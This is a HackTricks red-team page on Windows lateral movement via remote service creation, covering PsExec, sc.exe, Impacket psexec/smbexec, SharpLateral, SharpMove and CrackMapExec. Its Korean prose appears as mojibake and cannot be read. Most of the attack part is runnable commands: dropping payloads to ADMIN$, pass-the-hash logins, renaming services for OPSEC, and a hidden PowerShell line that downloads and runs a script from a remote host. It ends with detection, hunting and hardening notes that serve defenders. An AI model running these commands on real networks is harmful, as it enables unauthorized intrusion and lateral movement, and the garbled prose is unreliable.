PsExec/Winexec/ScExec/SMBExec

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

์–ด๋–ป๊ฒŒ ์ž‘๋™ํ•˜๋‚˜์š”

์ด ๊ธฐ์ˆ ๋“ค์€ SMB/RPC๋ฅผ ํ†ตํ•ด ์›๊ฒฉ์œผ๋กœ Windows ์„œ๋น„์Šค ์ œ์–ด ๊ด€๋ฆฌ์ž(SCM)๋ฅผ ์•…์šฉํ•˜์—ฌ ๋Œ€์ƒ ํ˜ธ์ŠคํŠธ์—์„œ ๋ช…๋ น์„ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์ธ ํ๋ฆ„์€ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค:

  1. ๋Œ€์ƒ์— ์ธ์ฆํ•˜๊ณ  SMB(TCP/445)๋ฅผ ํ†ตํ•ด ADMIN$ ๊ณต์œ ์— ์ ‘๊ทผํ•ฉ๋‹ˆ๋‹ค.
  2. ์‹คํ–‰ ํŒŒ์ผ์„ ๋ณต์‚ฌํ•˜๊ฑฐ๋‚˜ ์„œ๋น„์Šค๊ฐ€ ์‹คํ–‰ํ•  LOLBAS ๋ช…๋ น์ค„์„ ์ง€์ •ํ•ฉ๋‹ˆ๋‹ค.
  3. ํ•ด๋‹น ๋ช…๋ น์ด๋‚˜ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ๊ฐ€๋ฆฌํ‚ค๋Š” SCM(MS-SCMR over \PIPE\svcctl)์„ ํ†ตํ•ด ์›๊ฒฉ์œผ๋กœ ์„œ๋น„์Šค๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.
  4. ํŽ˜์ด๋กœ๋“œ๋ฅผ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•ด ์„œ๋น„์Šค๋ฅผ ์‹œ์ž‘ํ•˜๊ณ  ์„ ํƒ์ ์œผ๋กœ ๋ช…๋ช…๋œ ํŒŒ์ดํ”„๋ฅผ ํ†ตํ•ด stdin/stdout์„ ์บก์ฒ˜ํ•ฉ๋‹ˆ๋‹ค.
  5. ์„œ๋น„์Šค๋ฅผ ์ค‘์ง€ํ•˜๊ณ  ์ •๋ฆฌํ•ฉ๋‹ˆ๋‹ค(์„œ๋น„์Šค ๋ฐ ๋“œ๋กญ๋œ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์‚ญ์ œ).

์š”๊ตฌ ์‚ฌํ•ญ/์ „์ œ ์กฐ๊ฑด:

  • ๋Œ€์ƒ์—์„œ ๋กœ์ปฌ ๊ด€๋ฆฌ์ž(SeCreateServicePrivilege) ๋˜๋Š” ๋ช…์‹œ์ ์ธ ์„œ๋น„์Šค ์ƒ์„ฑ ๊ถŒํ•œ.
  • SMB(445)์— ์ ‘๊ทผ ๊ฐ€๋Šฅํ•˜๊ณ  ADMIN$ ๊ณต์œ ๊ฐ€ ์‚ฌ์šฉ ๊ฐ€๋Šฅ; ํ˜ธ์ŠคํŠธ ๋ฐฉํ™”๋ฒฝ์„ ํ†ตํ•ด ์›๊ฒฉ ์„œ๋น„์Šค ๊ด€๋ฆฌ ํ—ˆ์šฉ.
  • UAC ์›๊ฒฉ ์ œํ•œ: ๋กœ์ปฌ ๊ณ„์ •์˜ ๊ฒฝ์šฐ, ํ† ํฐ ํ•„ํ„ฐ๋ง์ด ๋„คํŠธ์›Œํฌ์—์„œ ๊ด€๋ฆฌ์ž๋ฅผ ์ฐจ๋‹จํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ๋‚ด์žฅ๋œ ๊ด€๋ฆฌ์ž ๋˜๋Š” LocalAccountTokenFilterPolicy=1์„ ์‚ฌ์šฉํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.
  • Kerberos vs NTLM: ํ˜ธ์ŠคํŠธ ์ด๋ฆ„/FQDN์„ ์‚ฌ์šฉํ•˜๋ฉด Kerberos๊ฐ€ ํ™œ์„ฑํ™”๋˜๊ณ , IP๋กœ ์—ฐ๊ฒฐํ•˜๋ฉด ์ข…์ข… NTLM์œผ๋กœ ๋˜๋Œ์•„๊ฐ€๋ฉฐ(๊ฐ•ํ™”๋œ ํ™˜๊ฒฝ์—์„œ๋Š” ์ฐจ๋‹จ๋  ์ˆ˜ ์žˆ์Œ).

์ˆ˜๋™ ScExec/WinExec via sc.exe

๋‹ค์Œ์€ ์ตœ์†Œํ•œ์˜ ์„œ๋น„์Šค ์ƒ์„ฑ ์ ‘๊ทผ ๋ฐฉ์‹์„ ๋ณด์—ฌ์ค๋‹ˆ๋‹ค. ์„œ๋น„์Šค ์ด๋ฏธ์ง€๋Š” ๋“œ๋กญ๋œ EXE ๋˜๋Š” cmd.exe ๋˜๋Š” powershell.exe์™€ ๊ฐ™์€ LOLBAS์ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

:: Execute a one-liner without dropping a binary
sc.exe \\TARGET create HTSvc binPath= "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt" start= demand
sc.exe \\TARGET start HTSvc
sc.exe \\TARGET delete HTSvc

:: Drop a payload to ADMIN$ and execute it (example path)
copy payload.exe \\TARGET\ADMIN$\Temp\payload.exe
sc.exe \\TARGET create HTSvc binPath= "C:\\Windows\\Temp\\payload.exe" start= demand
sc.exe \\TARGET start HTSvc
sc.exe \\TARGET delete HTSvc

๋…ธํŠธ:

  • ๋น„์„œ๋น„์Šค EXE๋ฅผ ์‹œ์ž‘ํ•  ๋•Œ ํƒ€์ž„์•„์›ƒ ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค; ์‹คํ–‰์€ ์—ฌ์ „ํžˆ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค.
  • OPSEC ์นœํ™”์„ฑ์„ ์œ ์ง€ํ•˜๊ธฐ ์œ„ํ•ด ํŒŒ์ผ ์—†๋Š” ๋ช…๋ น(cmd /c, powershell -enc)์„ ์„ ํ˜ธํ•˜๊ฑฐ๋‚˜ ๋“œ๋กญ๋œ ์•„ํ‹ฐํŒฉํŠธ๋ฅผ ์‚ญ์ œํ•˜์„ธ์š”.

์ž์„ธํ•œ ๋‹จ๊ณ„๋Š” ๋‹ค์Œ์—์„œ ํ™•์ธํ•˜์„ธ์š”: https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/

๋„๊ตฌ ๋ฐ ์˜ˆ์ œ

Sysinternals PsExec.exe

  • SMB๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ADMIN$์— PSEXESVC.exe๋ฅผ ๋“œ๋กญํ•˜๊ณ , ์ž„์‹œ ์„œ๋น„์Šค๋ฅผ ์„ค์น˜ํ•˜๋ฉฐ(๊ธฐ๋ณธ ์ด๋ฆ„ PSEXESVC), ๋ช…๋ช…๋œ ํŒŒ์ดํ”„๋ฅผ ํ†ตํ•ด I/O๋ฅผ ํ”„๋ก์‹œํ•˜๋Š” ๊ณ ์ „์ ์ธ ๊ด€๋ฆฌ ๋„๊ตฌ์ž…๋‹ˆ๋‹ค.
  • ์‚ฌ์šฉ ์˜ˆ:
:: Interactive SYSTEM shell on remote host
PsExec64.exe -accepteula \\HOST -s -i cmd.exe

:: Run a command as a specific domain user
PsExec64.exe -accepteula \\HOST -u DOMAIN\user -p 'Passw0rd!' cmd.exe /c whoami /all

:: Customize the service name for OPSEC (-r)
PsExec64.exe -accepteula \\HOST -r WinSvc$ -s cmd.exe /c ipconfig
  • WebDAV๋ฅผ ํ†ตํ•ด Sysinternals Live์—์„œ ์ง์ ‘ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:
\\live.sysinternals.com\tools\PsExec64.exe -accepteula \\HOST -s cmd.exe /c whoami

OPSEC

  • ์„œ๋น„์Šค ์„ค์น˜/์ œ๊ฑฐ ์ด๋ฒคํŠธ๋ฅผ ๋‚จ๊ธฐ๋ฉฐ (์„œ๋น„์Šค ์ด๋ฆ„์€ -r์ด ์‚ฌ์šฉ๋˜์ง€ ์•Š๋Š” ํ•œ ์ข…์ข… PSEXESVC) ์‹คํ–‰ ์ค‘ C:\Windows\PSEXESVC.exe๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

Impacket psexec.py (PsExec ์œ ์‚ฌ)

  • ๋‚ด์žฅ๋œ RemCom ์œ ์‚ฌ ์„œ๋น„์Šค๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ADMIN$๋ฅผ ํ†ตํ•ด ์ž„์‹œ ์„œ๋น„์Šค ๋ฐ”์ด๋„ˆ๋ฆฌ(์ผ๋ฐ˜์ ์œผ๋กœ ๋ฌด์ž‘์œ„ ์ด๋ฆ„)๋ฅผ ๋“œ๋กญํ•˜๊ณ , ์„œ๋น„์Šค๋ฅผ ์ƒ์„ฑํ•˜๋ฉฐ(๊ธฐ๋ณธ์ ์œผ๋กœ ์ข…์ข… RemComSvc), ๋ช…๋ช…๋œ ํŒŒ์ดํ”„๋ฅผ ํ†ตํ•ด I/O๋ฅผ ํ”„๋ก์‹œํ•ฉ๋‹ˆ๋‹ค.
# Password auth
psexec.py DOMAIN/user:Password@HOST cmd.exe

# Pass-the-Hash
psexec.py -hashes LMHASH:NTHASH DOMAIN/user@HOST cmd.exe

# Kerberos (use tickets in KRB5CCNAME)
psexec.py -k -no-pass -dc-ip 10.0.0.10 DOMAIN/user@host.domain.local cmd.exe

# Change service name and output encoding
psexec.py -service-name HTSvc -codec utf-8 DOMAIN/user:Password@HOST powershell -nop -w hidden -c "iwr http://10.10.10.1/a.ps1|iex"

์•„ํ‹ฐํŒฉํŠธ

  • C:\Windows\์— ์ž„์‹œ EXE (๋ฌด์ž‘์œ„ 8์ž). ์„œ๋น„์Šค ์ด๋ฆ„์€ ์žฌ์ •์˜๋˜์ง€ ์•Š๋Š” ํ•œ ๊ธฐ๋ณธ์ ์œผ๋กœ RemComSvc์ž…๋‹ˆ๋‹ค.

Impacket smbexec.py (SMBExec)

  • cmd.exe๋ฅผ ์ƒ์„ฑํ•˜๊ณ  I/O๋ฅผ ์œ„ํ•ด ๋ช…๋ช…๋œ ํŒŒ์ดํ”„๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ์ž„์‹œ ์„œ๋น„์Šค๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ ์ „์ฒด EXE ํŽ˜์ด๋กœ๋“œ๋ฅผ ๋“œ๋กญํ•˜๋Š” ๊ฒƒ์„ ํ”ผํ•˜๋ฉฐ, ๋ช…๋ น ์‹คํ–‰์€ ๋ฐ˜๋Œ€ํ™”์ ์ž…๋‹ˆ๋‹ค.
smbexec.py DOMAIN/user:Password@HOST
smbexec.py -hashes LMHASH:NTHASH DOMAIN/user@HOST

SharpLateral ๋ฐ SharpMove

  • SharpLateral (C#)๋Š” ์„œ๋น„์Šค ๊ธฐ๋ฐ˜ exec๋ฅผ ํฌํ•จํ•œ ์—ฌ๋Ÿฌ ์ธก๋ฉด ์ด๋™ ๋ฐฉ๋ฒ•์„ ๊ตฌํ˜„ํ•ฉ๋‹ˆ๋‹ค.
SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName
  • SharpMove๋Š” ์›๊ฒฉ์œผ๋กœ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•œ ์„œ๋น„์Šค ์ˆ˜์ •/์ƒ์„ฑ์„ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค.
SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService
  • CrackMapExec๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋‹ค์–‘ํ•œ ๋ฐฑ์—”๋“œ๋ฅผ ํ†ตํ•ด ์‹คํ–‰ํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค (psexec/smbexec/wmiexec):
cme smb HOST -u USER -p PASS -x "whoami" --exec-method psexec
cme smb HOST -u USER -H NTHASH -x "ipconfig /all" --exec-method smbexec

OPSEC, detection and artifacts

PsExec์™€ ์œ ์‚ฌํ•œ ๊ธฐ์ˆ ์„ ์‚ฌ์šฉํ•  ๋•Œ์˜ ์ผ๋ฐ˜์ ์ธ ํ˜ธ์ŠคํŠธ/๋„คํŠธ์›Œํฌ ์•„ํ‹ฐํŒฉํŠธ:

  • ๋ณด์•ˆ 4624 (๋กœ๊ทธ์˜จ ์œ ํ˜• 3) ๋ฐ 4672 (ํŠน์ˆ˜ ๊ถŒํ•œ)์—์„œ ์‚ฌ์šฉ๋œ ๊ด€๋ฆฌ์ž ๊ณ„์ •์— ๋Œ€ํ•œ ๋Œ€์ƒ.
  • ๋ณด์•ˆ 5140/5145 ํŒŒ์ผ ๊ณต์œ  ๋ฐ ํŒŒ์ผ ๊ณต์œ  ์„ธ๋ถ€ ์ด๋ฒคํŠธ๊ฐ€ ADMIN$ ์ ‘๊ทผ ๋ฐ ์„œ๋น„์Šค ๋ฐ”์ด๋„ˆ๋ฆฌ์˜ ์ƒ์„ฑ/์ž‘์„ฑ์„ ๋ณด์—ฌ์คŒ (์˜ˆ: PSEXESVC.exe ๋˜๋Š” ์ž„์˜์˜ 8์ž .exe).
  • ๋Œ€์ƒ์—์„œ์˜ ๋ณด์•ˆ 7045 ์„œ๋น„์Šค ์„ค์น˜: PSEXESVC, RemComSvc ๋˜๋Š” ์‚ฌ์šฉ์ž ์ •์˜ ์„œ๋น„์Šค ์ด๋ฆ„ (-r / -service-name).
  • Sysmon 1 (ํ”„๋กœ์„ธ์Šค ์ƒ์„ฑ) ์„œ๋น„์Šค.exe ๋˜๋Š” ์„œ๋น„์Šค ์ด๋ฏธ์ง€, 3 (๋„คํŠธ์›Œํฌ ์—ฐ๊ฒฐ), 11 (ํŒŒ์ผ ์ƒ์„ฑ) C:\Windows\์—์„œ, 17/18 (ํŒŒ์ดํ”„ ์ƒ์„ฑ/์—ฐ๊ฒฐ) \.\pipe\psexesvc, \.\pipe\remcom_* ๋˜๋Š” ๋ฌด์ž‘์œ„ ๋™๋“ฑ๋ฌผ์— ๋Œ€ํ•œ ํŒŒ์ดํ”„.
  • Sysinternals EULA์— ๋Œ€ํ•œ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์•„ํ‹ฐํŒฉํŠธ: HKCU\Software\Sysinternals\PsExec\EulaAccepted=0x1 ์šด์˜์ž ํ˜ธ์ŠคํŠธ์—์„œ (์–ต์ œ๋˜์ง€ ์•Š์€ ๊ฒฝ์šฐ).

์‚ฌ๋ƒฅ ์•„์ด๋””์–ด

  • ImagePath์— cmd.exe /c, powershell.exe ๋˜๋Š” TEMP ์œ„์น˜๊ฐ€ ํฌํ•จ๋œ ์„œ๋น„์Šค ์„ค์น˜์— ๋Œ€ํ•œ ๊ฒฝ๊ณ .
  • ParentImage๊ฐ€ C:\Windows\PSEXESVC.exe์ธ ํ”„๋กœ์„ธ์Šค ์ƒ์„ฑ ๋˜๋Š” LOCAL SYSTEM์œผ๋กœ ์‹คํ–‰๋˜๋Š” services.exe์˜ ์ž์‹ ํ”„๋กœ์„ธ์Šค ์ฐพ๊ธฐ.
  • -stdin/-stdout/-stderr๋กœ ๋๋‚˜๋Š” ๋ช…๋ช…๋œ ํŒŒ์ดํ”„ ๋˜๋Š” ์ž˜ ์•Œ๋ ค์ง„ PsExec ํด๋ก  ํŒŒ์ดํ”„ ์ด๋ฆ„ ํ”Œ๋ž˜๊ทธ ์ง€์ •.

Troubleshooting common failures

  • ์„œ๋น„์Šค ์ƒ์„ฑ ์‹œ ์•ก์„ธ์Šค ๊ฑฐ๋ถ€ (5): ์‹ค์ œ ๋กœ์ปฌ ๊ด€๋ฆฌ์ž๊ฐ€ ์•„๋‹˜, ๋กœ์ปฌ ๊ณ„์ •์— ๋Œ€ํ•œ UAC ์›๊ฒฉ ์ œํ•œ ๋˜๋Š” ์„œ๋น„์Šค ๋ฐ”์ด๋„ˆ๋ฆฌ ๊ฒฝ๋กœ์— ๋Œ€ํ•œ EDR ๋ณ€์กฐ ๋ฐฉ์ง€.
  • ๋„คํŠธ์›Œํฌ ๊ฒฝ๋กœ๋ฅผ ์ฐพ์„ ์ˆ˜ ์—†์Œ (53) ๋˜๋Š” ADMIN$์— ์—ฐ๊ฒฐํ•  ์ˆ˜ ์—†์Œ: SMB/RPC๋ฅผ ์ฐจ๋‹จํ•˜๋Š” ๋ฐฉํ™”๋ฒฝ ๋˜๋Š” ๊ด€๋ฆฌ ๊ณต์œ ๊ฐ€ ๋น„ํ™œ์„ฑํ™”๋จ.
  • Kerberos ์‹คํŒจํ•˜์ง€๋งŒ NTLM์ด ์ฐจ๋‹จ๋จ: ํ˜ธ์ŠคํŠธ ์ด๋ฆ„/FQDN (IP ์•„๋‹˜)์„ ์‚ฌ์šฉํ•˜์—ฌ ์—ฐ๊ฒฐ, ์ ์ ˆํ•œ SPN ๋ณด์žฅ ๋˜๋Š” Impacket ์‚ฌ์šฉ ์‹œ ํ‹ฐ์ผ“๊ณผ ํ•จ๊ป˜ -k/-no-pass ์ œ๊ณต.
  • ์„œ๋น„์Šค ์‹œ์ž‘ ์‹œ๊ฐ„์ด ์ดˆ๊ณผ๋˜์ง€๋งŒ ํŽ˜์ด๋กœ๋“œ๊ฐ€ ์‹คํ–‰๋จ: ์‹ค์ œ ์„œ๋น„์Šค ๋ฐ”์ด๋„ˆ๋ฆฌ๊ฐ€ ์•„๋‹ ๊ฒฝ์šฐ ์˜ˆ์ƒ; ์ถœ๋ ฅ์„ ํŒŒ์ผ๋กœ ์บก์ฒ˜ํ•˜๊ฑฐ๋‚˜ smbexec๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‹ค์‹œ๊ฐ„ I/O.

Hardening notes

  • Windows 11 24H2 ๋ฐ Windows Server 2025๋Š” ๊ธฐ๋ณธ์ ์œผ๋กœ ์•„์›ƒ๋ฐ”์šด๋“œ (๋ฐ Windows 11 ์ธ๋ฐ”์šด๋“œ) ์—ฐ๊ฒฐ์— ๋Œ€ํ•ด SMB ์„œ๋ช…์„ ์š”๊ตฌํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์œ ํšจํ•œ ์ž๊ฒฉ ์ฆ๋ช…์„ ๊ฐ€์ง„ ํ•ฉ๋ฒ•์ ์ธ PsExec ์‚ฌ์šฉ์„ ๋ฐฉํ•ดํ•˜์ง€ ์•Š์ง€๋งŒ ์„œ๋ช…๋˜์ง€ ์•Š์€ SMB ๋ฆด๋ ˆ์ด ๋‚จ์šฉ์„ ๋ฐฉ์ง€ํ•˜๊ณ  ์„œ๋ช…์„ ์ง€์›ํ•˜์ง€ ์•Š๋Š” ์žฅ์น˜์— ์˜ํ–ฅ์„ ๋ฏธ์น  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
  • ์ƒˆ๋กœ์šด SMB ํด๋ผ์ด์–ธํŠธ NTLM ์ฐจ๋‹จ (Windows 11 24H2/Server 2025)์€ IP๋กœ ์—ฐ๊ฒฐํ•˜๊ฑฐ๋‚˜ ๋น„-Kerberos ์„œ๋ฒ„์— ์—ฐ๊ฒฐํ•  ๋•Œ NTLM ํด๋ฐฑ์„ ๋ฐฉ์ง€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ฐ•ํ™”๋œ ํ™˜๊ฒฝ์—์„œ๋Š” NTLM ๊ธฐ๋ฐ˜ PsExec/SMBExec๊ฐ€ ์ค‘๋‹จ๋˜๋ฉฐ, Kerberos (ํ˜ธ์ŠคํŠธ ์ด๋ฆ„/FQDN)๋ฅผ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ ํ•ฉ๋ฒ•์ ์œผ๋กœ ํ•„์š”ํ•  ๊ฒฝ์šฐ ์˜ˆ์™ธ๋ฅผ ๊ตฌ์„ฑํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.
  • ์ตœ์†Œ ๊ถŒํ•œ ์›์น™: ๋กœ์ปฌ ๊ด€๋ฆฌ์ž ๋ฉค๋ฒ„์‹ญ ์ตœ์†Œํ™”, Just-in-Time/Just-Enough Admin ์„ ํ˜ธ, LAPS ์‹œํ–‰, 7045 ์„œ๋น„์Šค ์„ค์น˜ ๋ชจ๋‹ˆํ„ฐ๋ง/๊ฒฝ๊ณ .

See also

  • WMI ๊ธฐ๋ฐ˜ ์›๊ฒฉ ์‹คํ–‰ (์ข…์ข… ํŒŒ์ผ๋ฆฌ์Šค):

WmiExec

  • WinRM ๊ธฐ๋ฐ˜ ์›๊ฒฉ ์‹คํ–‰:

WinRM

References

  • PsExec - Sysinternals | Microsoft Learn: https://learn.microsoft.com/sysinternals/downloads/psexec
  • Windows Server 2025 ๋ฐ Windows 11์˜ SMB ๋ณด์•ˆ ๊ฐ•ํ™” (๊ธฐ๋ณธ์ ์œผ๋กœ ์„œ๋ช…, NTLM ์ฐจ๋‹จ): https://techcommunity.microsoft.com/blog/filecab/smb-security-hardening-in-windows-server-2025โ€“windows-11/4226591

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ